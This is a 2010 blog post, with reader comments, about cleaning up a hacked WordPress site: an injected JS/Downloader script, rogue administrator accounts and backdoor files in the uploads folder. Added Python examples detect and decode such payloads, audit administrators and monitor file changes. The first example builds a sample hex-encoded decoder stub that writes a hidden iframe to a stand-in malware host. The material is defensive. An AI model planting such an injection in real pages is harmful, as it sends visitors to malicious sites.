February 8, 2010

This Site’s Hack Adventure

Filed under: Main — admin @ 12:01 am

It appears that I’ve plugged the leak that was causing this blog to be hacked. I hope.

It began on Friday morning, when I received an email from “Linuxlove” who wrote:

Tried going to your blog to read the latest Wambooli news but all of the Wambooli blog is cut off by AVG which claims that your blog has a virus “JS/Downloader.Agent”.

And it did! I dumped the raw version of the blog’s homepage and saw the telltale signs of the JS/Downloader.

JS/Downloader is a chunk of obfuscated JavaScript: the payload appears as several lines of hexadecimal numbers, or sometimes one long string of values, followed by a few lines of code that decode it when the page loads.

The decoded code becomes HTML instructions that redirect the visitor’s browser to somewhere else on the Internet. Somewhere nasty.

There were also about 250 links added with the hack, invisible links, links that went out to various pirate sites for downloading movies.
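As an added example, not code from the original post, the following script scans a saved copy of a page’s HTML for the two kinds of injection described above: it decodes the hex-encoded JavaScript payload to show where the browser would be sent, and it lists links hidden inside invisible containers. It assumes the payload uses the common two-hex-digits-per-character encoding that the accompanying stub reverses with String.fromCharCode (other encoders exist, and the regular expressions are heuristics, not a malware signature). SAMPLE_PAGE and the .invalid hostnames in it are constructed for this example.

```python
"""Added example: spot and decode a JS/Downloader-style hex payload and list
hidden links in a captured page. Not the blog's own code; SAMPLE_PAGE below is
constructed, with reserved .invalid hostnames standing in for real hosts."""
import re

# Telltale 1: a long quoted run of hex digits, with the processing lines
# (String.fromCharCode / unescape / eval) following shortly after it.
HEX_BLOB = re.compile(r'["\']([0-9a-fA-F]{40,})["\']')
DECODER_STUB = re.compile(r'String\.fromCharCode|unescape\s*\(|eval\s*\(')

# Telltale 2: anchors inside a container the visitor never sees.
HIDDEN_BLOCK = re.compile(
    r'<(div|span|p)\b[^>]*style\s*=\s*"[^"]*'
    r'(?:display\s*:\s*none|visibility\s*:\s*hidden)[^"]*"[^>]*>(.*?)</\1>',
    re.I | re.S)
ANCHOR = re.compile(r'<a\s[^>]*href\s*=\s*"([^"]+)"', re.I)
SRC_OR_HREF = re.compile(r'(?:src|href|url)\s*=\s*["\']?([^"\'\s>]+)', re.I)


def decode_hex_payload(blob):
    """Undo the two-hex-digits-per-character encoding, as the stub does."""
    return bytes.fromhex(blob).decode("latin-1")


def find_js_downloader(html, window=400):
    """Decoded payloads for every hex blob followed closely by a decoder stub."""
    payloads = []
    for m in HEX_BLOB.finditer(html):
        # The processing lines sit within a few hundred bytes after the blob.
        if DECODER_STUB.search(html, m.end(), m.end() + window):
            try:
                payloads.append(decode_hex_payload(m.group(1)))
            except ValueError:  # odd length or not hex: not this encoding
                continue
    return payloads


def redirect_targets(payloads):
    """Where the decoded HTML sends the browser (iframe src, meta refresh url...)."""
    targets = []
    for p in payloads:
        targets.extend(SRC_OR_HREF.findall(p))
    return targets


def find_hidden_links(html):
    """Every href inside a display:none / visibility:hidden container."""
    links = []
    for m in HIDDEN_BLOCK.finditer(html):
        links.extend(ANCHOR.findall(m.group(2)))
    return links


# Constructed sample: the hex blob is generated from PAYLOAD_SAMPLE so the
# reader can see exactly what the stub reconstructs.
PAYLOAD_SAMPLE = ('<iframe src="http://malware.example.invalid/in.php" '
                  'width="0" height="0"></iframe>')
SAMPLE_PAGE = (
    '<html><head><title>Wambooli</title>\n'
    '<script type="text/javascript">\n'
    'var x="' + PAYLOAD_SAMPLE.encode().hex() + '";\n'
    'var s="";for(var i=0;i<x.length;i+=2)'
    '{s+=String.fromCharCode(parseInt(x.substr(i,2),16));}\n'
    'document.write(s);\n'
    '</script></head><body><p>Latest Wambooli news...</p>\n'
    '<div style="display:none">\n'
    '<a href="http://pirate-one.example.invalid/movies">free movies</a>\n'
    '<a href="http://pirate-two.example.invalid/dvd">dvd rips</a>\n'
    '</div></body></html>\n')

if __name__ == "__main__":
    payloads = find_js_downloader(SAMPLE_PAGE)
    for p in payloads:
        print("decoded payload:", p)
    print("redirect targets:", redirect_targets(payloads))
    print("hidden links:", find_hidden_links(SAMPLE_PAGE))
```

Run it against the raw HTML as served (curl or wget, not a browser’s “view source” after scripts have run), since the point is to see the blob before the stub decodes it.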

I use WordPress for my blog, though I’ve customized it somewhat. I saw that the JS/Downloader was installed in the Header file, so it was easy to remove the malicious code.

Friday evening, however, the JS/Downloader script was re-installed. I removed it again and took a more serious look at what could be causing it.

The first thing I noticed was that two users on the blog had been promoted to Administrator status. They were probably bots, but who knows? I deleted the users and the problems have stopped. So far.

I’ve also changed all the passwords used by the site, as well as the site’s security keys. The only further step I can take, should the attack repeat itself, is to re-install all the software from a fresh version. I am poised to do that should another attack happen, especially because I have no idea how the users were able to gain administrator access. It might be an exploit that’s still open.
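As an added example, not code from the original post, here is the kind of audit that would have surfaced the two promoted accounts, together with a generator for fresh wp-config.php security keys. It assumes the default “wp_” table prefix (WordPress stores roles in wp_usermeta under the meta_key &lt;prefix&gt;capabilities as a PHP-serialized array) and loads constructed sample rows into an in-memory SQLite copy of the two tables so it runs offline; against a live site the same query runs over MySQL. The user names and e-mail addresses are made up.

```python
"""Added example: list administrator accounts that are not on the owner's
allowlist, and produce replacement values for the wp-config.php keys.
Not the blog's own code; assumes the default wp_ prefix; sample rows are
constructed."""
import re
import secrets
import sqlite3
import string

ADMIN_QUERY = """
SELECT u.ID, u.user_login, u.user_email, u.user_registered, m.meta_value
FROM wp_users AS u
JOIN wp_usermeta AS m ON m.user_id = u.ID
WHERE m.meta_key = 'wp_capabilities'
  AND m.meta_value LIKE '%administrator%'
ORDER BY u.ID
"""

# WordPress serializes roles like  a:1:{s:13:"administrator";b:1;}
# Pull out every role name whose flag is true.
ROLE_RE = re.compile(r's:\d+:"([^"]+)";b:1;')


def roles_from_serialized(meta_value):
    return set(ROLE_RE.findall(meta_value))


def find_unexpected_admins(conn, allowed_logins):
    """(login, email, registered) for every administrator not in allowed_logins."""
    rogue = []
    for _id, login, email, registered, caps in conn.execute(ADMIN_QUERY):
        if "administrator" in roles_from_serialized(caps) and login not in allowed_logins:
            rogue.append((login, email, registered))
    return rogue


# Rotating these invalidates every existing login cookie, which is why the
# keys should change whenever an administrator account may be in the wrong hands.
KEY_NAMES = ("AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY",
             "AUTH_SALT", "SECURE_AUTH_SALT", "LOGGED_IN_SALT", "NONCE_SALT")
# Printable ASCII minus the two characters that need escaping inside the
# single-quoted PHP string literal in wp-config.php.
KEY_ALPHABET = "".join(c for c in string.ascii_letters + string.digits + string.punctuation
                       if c not in "'\\")


def fresh_wp_keys(length=64):
    return {name: "".join(secrets.choice(KEY_ALPHABET) for _ in range(length))
            for name in KEY_NAMES}


def wp_config_lines(keys):
    return "\n".join("define('%s', '%s');" % (name, value) for name, value in keys.items())


def sample_db():
    """Constructed miniature of wp_users / wp_usermeta with two rogue admins."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
    CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT,
                           user_email TEXT, user_registered TEXT);
    CREATE TABLE wp_usermeta (umeta_id INTEGER PRIMARY KEY, user_id INTEGER,
                              meta_key TEXT, meta_value TEXT);
    """)
    users = [
        (1, "admin", "owner@wambooli.example", "2005-03-01 10:00:00",
         'a:1:{s:13:"administrator";b:1;}'),
        (2, "jane", "jane@wambooli.example", "2008-06-12 09:30:00",
         'a:1:{s:6:"editor";b:1;}'),
        (3, "x7k2q", "x7k2q@mail.example", "2010-02-05 03:11:42",
         'a:1:{s:13:"administrator";b:1;}'),
        (4, "subscriber_bob", "bob@mail.example", "2009-11-20 15:00:00",
         'a:1:{s:10:"subscriber";b:1;}'),
        (5, "moviez", "moviez@mail.example", "2010-02-05 03:12:07",
         'a:2:{s:10:"subscriber";b:1;s:13:"administrator";b:1;}'),
    ]
    for uid, login, email, registered, caps in users:
        conn.execute("INSERT INTO wp_users VALUES (?,?,?,?)", (uid, login, email, registered))
        conn.execute("INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (?,?,?)",
                     (uid, "wp_capabilities", caps))
    return conn


if __name__ == "__main__":
    conn = sample_db()
    for login, email, registered in find_unexpected_admins(conn, {"admin"}):
        print("unexpected administrator: %s <%s> registered %s" % (login, email, registered))
    print(wp_config_lines(fresh_wp_keys()))
```

The registration timestamps are worth printing: accounts created minutes apart in the middle of the night, right before the first defacement, are exactly the bot pattern the post describes.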

I’d like to thank Linuxlove for sending me the email and pointing out the compromised site. According to the HoneyGrid report:

71% of Web sites with malicious code are legitimate sites that have been compromised.

It is my hope that the Wambooli blog never becomes one of that 71 percent.

6 Comments

  1. So uh, if I hadn’t emailed you we all would have had viruses by now?

    “It is my that the Wambooli blog never become one of that 71 percent.”
    It’s my hope that my site, forums and IRC chat don’t become malicious sites too.

    offtopic: yay top-level domain. yay to finding out that you can’t restart apache2 on anything else other than the host computer. yay for phpBB. yay for me going on and on…

    Comment by linuxlove — February 8, 2010 @ 6:59 am

  2. It would have taken a bit longer for me to discover the infection, my friend. Your timing was perfect, though, as I believe you emailed me probably 45 minutes after the site was hacked. The JS/Downloader is an older hack, and if you’ve been keeping your web browsers up to date, it probably wouldn’t have infected anyone. On my Mac, it merely redirected me to a fake Yahoo-like web page where I could download lots of “free” movies.

    I have also implemented a few toys on the site now that alert me whenever something is changed by someone other than myself. That may work, but only time will tell.

    Comment by admin — February 8, 2010 @ 7:08 am

  3. I also have to ask, why is the copyright held by “Quantum Particle Bottling Co.”? Is it just you making a joke or something?

    Comment by linuxlove — February 8, 2010 @ 9:12 am

  4. QPBC is my company. The copyright is my right to limit reproduction of my material, which may or may not work. I hosted an image of one of my cars on Wambooli a long, long time ago. The same image was used by a car dealer in another state. A simple letter informing them of the copyright violation was enough to get them to remove the image, though I also made him the offer to pay me for use of the image. He declined.

    Comment by admin — February 8, 2010 @ 10:25 am

  5. Spoke too soon! Another hack today. My scanning program caught the modification in just 9 minutes, so I was able to fix things. I’ve also reinstalled the entire site, including WordPress and the databases from scratch. That took just under an hour.

    This is getting annoying…

    Comment by admin — February 9, 2010 @ 3:34 pm

  6. Okay. I’m sure I got it now. I just found a file named wp-inclode.php hidden in this blog’s uploads folder. A companion file, fotter.php, was also found. Apparently that’s an old exploit for WordPress. I’m glad that I caught them, and I believe that should be the end of the hacking adventure!

    Comment by admin — February 9, 2010 @ 4:23 pm
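As an added example, not the blog’s own code, the script below does the two things comments 2 and 6 describe: it keeps a hash baseline of the site’s files and reports what was added, removed or changed since the last run (the “alert me whenever something is changed” check), and it flags any PHP-like file under wp-content/uploads, where WordPress only stores media. It assumes the site is one directory tree with uploads at wp-content/uploads; the sample site it builds in a temporary directory, including the two dropped file names, is constructed for this example and the dropped files contain only placeholder text.

```python
"""Added example: file-change detector plus a check for scripts in the
uploads folder. Not the blog's own code; the temporary sample site is
constructed and the "backdoor" files hold only placeholder comments."""
import hashlib
import json
import os
import tempfile

UPLOADS_DIR = "wp-content/uploads"
SCRIPT_SUFFIXES = (".php", ".php3", ".php4", ".php5", ".phtml", ".phar")


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root):
    """Map every file under root (relative, '/'-separated) to its SHA-256."""
    out = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            out[rel] = sha256_file(full)
    return out


def diff_snapshots(old, new):
    """(added, removed, changed) path lists, each sorted."""
    added = sorted(set(new) - set(old))
    removed = sorted(set(old) - set(new))
    changed = sorted(p for p in old.keys() & new.keys() if old[p] != new[p])
    return added, removed, changed


def php_in_uploads(snap, uploads_dir=UPLOADS_DIR):
    """Executable-looking files under uploads: a strong sign of a dropped backdoor."""
    prefix = uploads_dir.rstrip("/") + "/"
    return sorted(p for p in snap
                  if p.startswith(prefix) and p.lower().endswith(SCRIPT_SUFFIXES))


def save_baseline(snap, path):
    with open(path, "w") as f:
        json.dump(snap, f, sort_keys=True)


def load_baseline(path):
    with open(path) as f:
        return json.load(f)


def _write(root, rel, data):
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "wb") as f:
        f.write(data)


def build_sample_site(root):
    """Constructed clean site: config, a theme header and one uploaded image."""
    _write(root, "wp-config.php", b"<?php define('DB_NAME', 'blog');\n")
    _write(root, "wp-content/themes/wambooli/header.php",
           b"<html><head><title>Wambooli</title></head>\n")
    _write(root, "wp-content/uploads/2010/02/car.jpg", b"\xff\xd8\xff\xe0 sample bytes")


def compromise_sample_site(root):
    """Constructed attack: header modified, two scripts dropped into uploads."""
    _write(root, "wp-content/themes/wambooli/header.php",
           b"<html><head><title>Wambooli</title><script>var x='4142';</script></head>\n")
    _write(root, "wp-content/uploads/wp-inclode.php", b"<?php /* placeholder */ ?>")
    _write(root, "wp-content/uploads/2010/fotter.php", b"<?php /* placeholder */ ?>")


def run_demo():
    """Baseline the clean site, compromise it, report what the scan sees."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_site(root)
        baseline = snapshot(root)
        compromise_sample_site(root)
        current = snapshot(root)
        added, removed, changed = diff_snapshots(baseline, current)
        return added, removed, changed, php_in_uploads(current)


if __name__ == "__main__":
    added, removed, changed, scripts = run_demo()
    print("added:  ", added)
    print("removed:", removed)
    print("changed:", changed)
    print("scripts under uploads:", scripts)
```

In practice save_baseline runs once on a known-clean install (right after a fresh re-install is the ideal moment), and a cron job a few minutes apart calls snapshot, diff_snapshots and php_in_uploads and mails anything non-empty; keep the baseline file outside the web root so an attacker with write access to the site cannot simply update it.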



Powered by WordPress